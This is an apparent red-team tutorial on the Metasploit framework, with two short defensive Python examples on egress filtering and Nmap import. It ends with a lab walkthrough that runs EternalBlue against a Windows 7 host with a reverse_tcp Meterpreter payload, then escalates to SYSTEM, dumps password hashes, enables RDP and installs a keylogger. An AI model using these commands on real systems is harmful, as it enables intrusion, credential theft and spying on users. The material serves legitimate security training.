In this post I am going to briefly cover the exploitation process with the Metasploit framework. A framework is defined as a real or conceptual structure intended to serve as a support or guide for building something that expands the structure into something useful. The Metasploit framework allows red teamers to configure an exploit, choose a payload and an encoding technique to obfuscate the payload, and run post-exploitation modules after access is gained. The next couple of sections walk through the process of exploitation. I believe the Metasploit approach is a template worth knowing because other frameworks and tools follow the same flow.
Exploits vs. vulnerabilities
In the simplest of terms, a vulnerability is a weakness in a system. Vulnerabilities exist in operating systems, applications and hardware appliances. An exploit takes advantage of a vulnerability to gain control of an asset and potentially cause harm to a system.
Bind shells vs. reverse shells
One of the most common points of confusion for beginners in security is the difference between bind and reverse shells. Bind shells are typically not used because there are obstacles to overcome when using them. First, bind shells require an attacker to already have access to a system in order to bind the shell to a port. Second, bind shells are not useful if the infected system is behind a firewall/NAT device: the firewall/NAT has to have a rule allowing traffic initiated from the attacker to flow through the device to the bind shell. This type of setup is not ideal and leaves artifacts behind that can be discovered. However, if a bind shell is set up correctly it allows an attacker to initiate a connection to the infected box at any time.
The better alternative is a reverse shell, which can flow through a firewall/NAT device with ease. This works because firewall/NAT devices are meant to block ingress (inbound) traffic by default, while allowing all egress (outbound) traffic out of the network to its destination. We inherently trust the devices in our own network and block outside devices from initiating connections to our network. Reverse shells take advantage of how these technologies function. An attacker will typically use a phishing-style attack to send a user a malicious PDF. If the user decides to open the PDF, it will initiate a connection from the user’s PC back to our attacking box.
Red team tip
A famous red teamer who goes by the name of Mubix has a saying: “Two is one and one is none”. What this means is that if you have two shells on a box and the blue team finds one, you can still act. If you only have one shell and they cut that access, you no longer have control of that box. In a later post I will be covering various persistence mechanisms that can be used to keep access on a box.
Metasploit listeners are how reverse shells connect back to us. During the payload stage (see the payload section below) we instruct our reverse shell how to connect back to us when the exploit is executed. This listener can be set up to handle one or more reverse shell connections. The great thing about the Metasploit framework is that listeners accommodate all types of protocols and options.
The most common type of connection is a reverse_tcp listener, which establishes a connection between the attacker (server) and the infected machine (client). Metasploit also provides a reverse_http listener, which communicates between the attacker and the infected machine via HTTP. The reason for an HTTP listener is that a network may have strict egress filtering. Almost all networks allow DNS and HTTP outbound because they are the most widely used protocols on the internet. Since HTTP looks like normal traffic, it may bypass security measures in place that would stop malicious outbound connections such as a reverse_tcp shell.
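The two paragraphs above make a defensive point that is easy to verify in code: a default-allow egress policy lets a reverse_tcp callback through, a strict allow-list stops it, and a reverse_http-style callback still passes the allow-list and has to be caught by inspecting the connections that were allowed. The following is an added example written for this post, not code from the original article or from Metasploit. The flow records, the internal network range, the egress allow-list and the long-lived/low-volume thresholds are all constructed here for illustration.

```python
"""Egress-policy review over constructed connection records.

Models the post's point about firewall/NAT behaviour: outbound connections
leave the network unless egress is filtered, and a callback on an allowed
port (e.g. 80/tcp) is only visible by looking at the allowed traffic itself.
"""
import ipaddress
from typing import Dict, List, Tuple

# Constructed NetFlow-style records:
# (src_ip, dst_ip, dst_port, protocol, bytes_sent, duration_seconds)
Flow = Tuple[str, str, int, str, int, int]

SAMPLE_FLOWS: List[Flow] = [
    ("10.0.0.15", "93.184.216.34", 443, "tcp", 15_000, 2),   # ordinary web browsing
    ("10.0.0.15", "203.0.113.9", 1234, "tcp", 900, 3_600),    # callback to a listener on an unusual port
    ("10.0.0.22", "203.0.113.9", 80, "tcp", 600, 7_200),      # long-lived, low-volume session on a web port
    ("10.0.0.22", "10.0.0.5", 53, "udp", 120, 0),             # internal DNS, never leaves the network
    ("10.0.0.40", "198.51.100.7", 53, "udp", 80, 0),          # external DNS, short and small
]

# Assumed internal address space (constructed for the example).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# A strict egress allow-list: only DNS and web are permitted outbound.
ALLOWED_EGRESS = {("udp", 53), ("tcp", 80), ("tcp", 443)}


def is_internal(ip: str) -> bool:
    """True if the address belongs to one of the internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def egress_verdict(flow: Flow, allowed=ALLOWED_EGRESS,
                   long_lived_s: int = 1800, low_volume_bytes: int = 4096) -> str:
    """Classify one flow against the egress policy.

    'internal'           : destination is inside the network; the firewall never sees it
    'blocked'            : a default-deny egress policy stops it (the reverse_tcp case)
    'allowed-suspicious' : permitted by the policy but long-lived and low-volume,
                           the shape of an interactive session riding an allowed port
    'allowed'            : permitted and unremarkable
    """
    _src, dst, port, proto, nbytes, duration = flow
    if is_internal(dst):
        return "internal"
    if (proto, port) not in allowed:
        return "blocked"
    if duration >= long_lived_s and nbytes <= low_volume_bytes:
        return "allowed-suspicious"
    return "allowed"


def summarize(flows: List[Flow]) -> Dict[str, int]:
    """Count verdicts so the policy's effect on a capture is visible at a glance."""
    counts: Dict[str, int] = {}
    for flow in flows:
        verdict = egress_verdict(flow)
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


if __name__ == "__main__":
    for flow in SAMPLE_FLOWS:
        print(f"{flow[0]:>10} -> {flow[1]:<15} {flow[3]}/{flow[2]:<5} {egress_verdict(flow)}")
    print(summarize(SAMPLE_FLOWS))
```

The second record is the shape of the reverse_tcp callback used later in this post (an arbitrary high port): it is only stopped if the allow-list exists. The third record passes the allow-list, which is why the post says an HTTP listener gets through strict filtering; the duration/volume check is the kind of secondary control that still surfaces it.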
The Metasploit Framework provides multiple types of payloads, but we are going to cover singles, stagers, stages, Meterpreter, and inline payloads. Payloads are typically used to create a connection between the attacker machine and the infected machine. The payload allows us to send commands to the infected machine for the next task or set of tasks. This section will cover the basics of a payload.
Payloads are typically broken down into stagers and stages. Stagers are small strings of shellcode because the initial space available to execute code is small. The stager creates a connection back to the attacker machine to fetch the next execution stage, and it also allocates a chunk of memory big enough to hold that stage.
Stages are requested by the stager and are traditionally much larger. A stage can even be written in C because the space requirement is no longer a factor. Furthermore, a stage may provide additional functionality such as Meterpreter.
Post-exploitation modules are run on a compromised system to gather information, capture data, and manage the system. Gathering modules are used, as the name implies, to gather data. For example, we can check if the compromised system is a VM, collect user hashes, get a dump of recently opened files, and get a list of applications installed on the system. Capture modules are used to capture data from the user on the remote system. For example, we can capture keystrokes, screenshots of the desktop, webcam footage, and microphone audio. Manage modules are used to perform system administration actions on the compromised system. For example, we can enable remote desktop, delete users, add network routes, and migrate between processes.
Auxiliary modules can be run remotely or through a session on a compromised box. Auxiliary modules are broken down into five categories: admin, scanner, server, fuzzing, and gathering. Admin modules are used to administer software or devices. For example, we can launch AWS EC2 instances if we have AWS keys, reset passwords on particular services, or back up a Windows registry.
Scanner modules are used to scan for network services and then brute-force a login to that service. For example, we can scan for SMB shares on a network and then attempt to brute-force a share login. Server modules are used to host certain network services on a network. For example, we could host an FTP server for file and credential collection, a DHCP server to hand out IP allocations, or a DNS server to control domain queries. Fuzzing modules send random strings of data at network services, in the hope that a fuzzer sends a string the service was not built to handle and crashes it. Gathering modules obtain information from network services, such as enumerating DNS hostnames.
Metasploit uses a PostgreSQL database to store sessions and information obtained with Metasploit. For example, Metasploit has Nmap built into the framework, and the results of scans are stored in the database: when a new host is discovered during a scan it is added to the database, and this list can then be used when a module has an RHOSTS option.
Metasploit has a feature called workspaces. This allows you to separate the data that is discovered based on different clients.
- Will show a list of current workspaces
- workspace -a <name>
- Will create a workspace
- workspace -d <name>
- Will delete a workspace
- workspace <name>
- Will switch to a different workspace
Importing and scanning
- db_import <nmap scan file>
- This command will import a list of hosts from an nmap scan output file
- db_nmap <nmap option and flags>
- This command will launch an nmap scan and save hosts into the database
- This command will print a list of known hosts
- This command shows a list of known services discovered from known hosts
- This command will show a list of credentials that are a username and password pair
- This command will show a list of user hashes that are a username and hashed password pair
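To make the database section concrete, here is a small stand-in for what db_import and the hosts/services tables do, including per-client separation in the style of workspaces. This is an added example written for this post; it is not code from the original article or from Metasploit, and the Nmap XML document, the host names and the workspace names are constructed here. The address 172.16.54.144 is the target used later in this post; the other addresses are made up.

```python
"""Import Nmap XML into host and service records, grouped by workspace.

A minimal model of `db_import`, `hosts`, `services` and `workspace`, useful
on the defensive side for asset inventory: every host that exposes a
service is the list you verify patching on.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

# Constructed Nmap XML output (trimmed to the elements db_import cares about).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 172.16.54.0/24">
  <host>
    <status state="up"/>
    <address addr="172.16.54.144" addrtype="ipv4"/>
    <hostnames><hostname name="win7-client" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="172.16.54.150" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="172.16.54.151" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

Host = Dict[str, Optional[str]]
Service = Dict[str, object]


def import_nmap(xml_text: str) -> Tuple[List[Host], List[Service]]:
    """Parse Nmap XML into (hosts, services); hosts that were down are skipped."""
    root = ET.fromstring(xml_text)
    hosts: List[Host] = []
    services: List[Service] = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        name_el = host.find("hostnames/hostname")
        hosts.append({"address": addr, "name": name_el.get("name") if name_el is not None else None})
        for port in host.findall("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "name": svc.get("name") if svc is not None else None,
            })
    return hosts, services


def open_hosts(services: List[Service], port: int, proto: str = "tcp") -> List[str]:
    """Addresses with the given service open: the list an RHOSTS option would be
    fed, and for a defender the machines to check for the matching patch."""
    return sorted({str(s["host"]) for s in services
                   if s["port"] == port and s["proto"] == proto and s["state"] == "open"})


class Workspaces:
    """Per-client separation of imported data, mirroring `workspace -a/-d/<name>`."""

    def __init__(self) -> None:
        self._data: Dict[str, Dict[str, list]] = {"default": {"hosts": [], "services": []}}
        self.current = "default"

    def add(self, name: str) -> List[str]:
        self._data.setdefault(name, {"hosts": [], "services": []})
        return sorted(self._data)

    def delete(self, name: str) -> List[str]:
        # Guarding the active workspace is this example's choice, not a framework rule.
        if name == self.current:
            raise ValueError("switch to another workspace before deleting the active one")
        del self._data[name]
        return sorted(self._data)

    def switch(self, name: str) -> None:
        if name not in self._data:
            raise KeyError(name)
        self.current = name

    def db_import(self, xml_text: str) -> Tuple[int, int]:
        hosts, services = import_nmap(xml_text)
        self._data[self.current]["hosts"].extend(hosts)
        self._data[self.current]["services"].extend(services)
        return len(hosts), len(services)

    def hosts(self) -> List[Host]:
        return self._data[self.current]["hosts"]

    def services(self) -> List[Service]:
        return self._data[self.current]["services"]


if __name__ == "__main__":
    ws = Workspaces()
    ws.add("client-a")
    ws.switch("client-a")
    print("imported (hosts, services):", ws.db_import(SAMPLE_NMAP_XML))
    print("hosts with 445/tcp open:", open_hosts(ws.services(), 445))
```

Running it imports two live hosts and three service rows into the client-a workspace and reports the one host exposing SMB on 445/tcp; the default workspace stays empty, which is the separation the post describes.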
Attacking Windows 7 with EternalBlue
This section will walk through using what we learned above with the EternalBlue exploit to gain access to a system. Once we have access to the host we can escalate to SYSTEM and have complete control of the infected system.
Starting Metasploit on Kali Linux 2.0
- service postgresql start
- msfdb init
- Initializes the Metasploit database
Selecting/setup of exploit
- use exploit/windows/smb/ms17_010_eternalblue
- show options
- Shows all the configurable options for the exploit
- set RHOST 172.16.54.144
- Sets the IP of the remote host we will be attacking
Selecting/setup of the payload
- set PAYLOAD windows/x64/meterpreter/reverse_tcp
- Sets Meterpreter as the payload, using a reverse TCP connection
- show options
- Shows all the configurable options for the payload
- set LHOST 172.16.54.141
- Sets the IP the payload connects back to, which is our attacking machine
- set LPORT 1234
- Sets the port the payload connects back to
- This will send the exploit to the remote machine. The exploit runs and the payload calls back for the second part of the payload, the stage. Once the stage is delivered we have a fully functional Meterpreter session.
- Shows all the commands/tasks that are built into Meterpreter that can be leveraged.
- This command will use various known techniques to escalate privileges to SYSTEM.
- This command will dump the hashes of each user on the system
- This command will take the Meterpreter session and push it to the background. This means we can pull the session back from the background and use it later.
- This command will print a list of usable sessions
- sessions -i 1
- This command will allow us to take control of the Meterpreter session again.
- run post/windows/gather/enum_applications
- This module will get a list of applications installed on the remote machine
- run post/windows/manage/enable_rdp
- This module will enable remote desktop on the remote machine
- run post/windows/capture/keylog_recorder
- This module will install a key logger and record keystrokes to the file it lists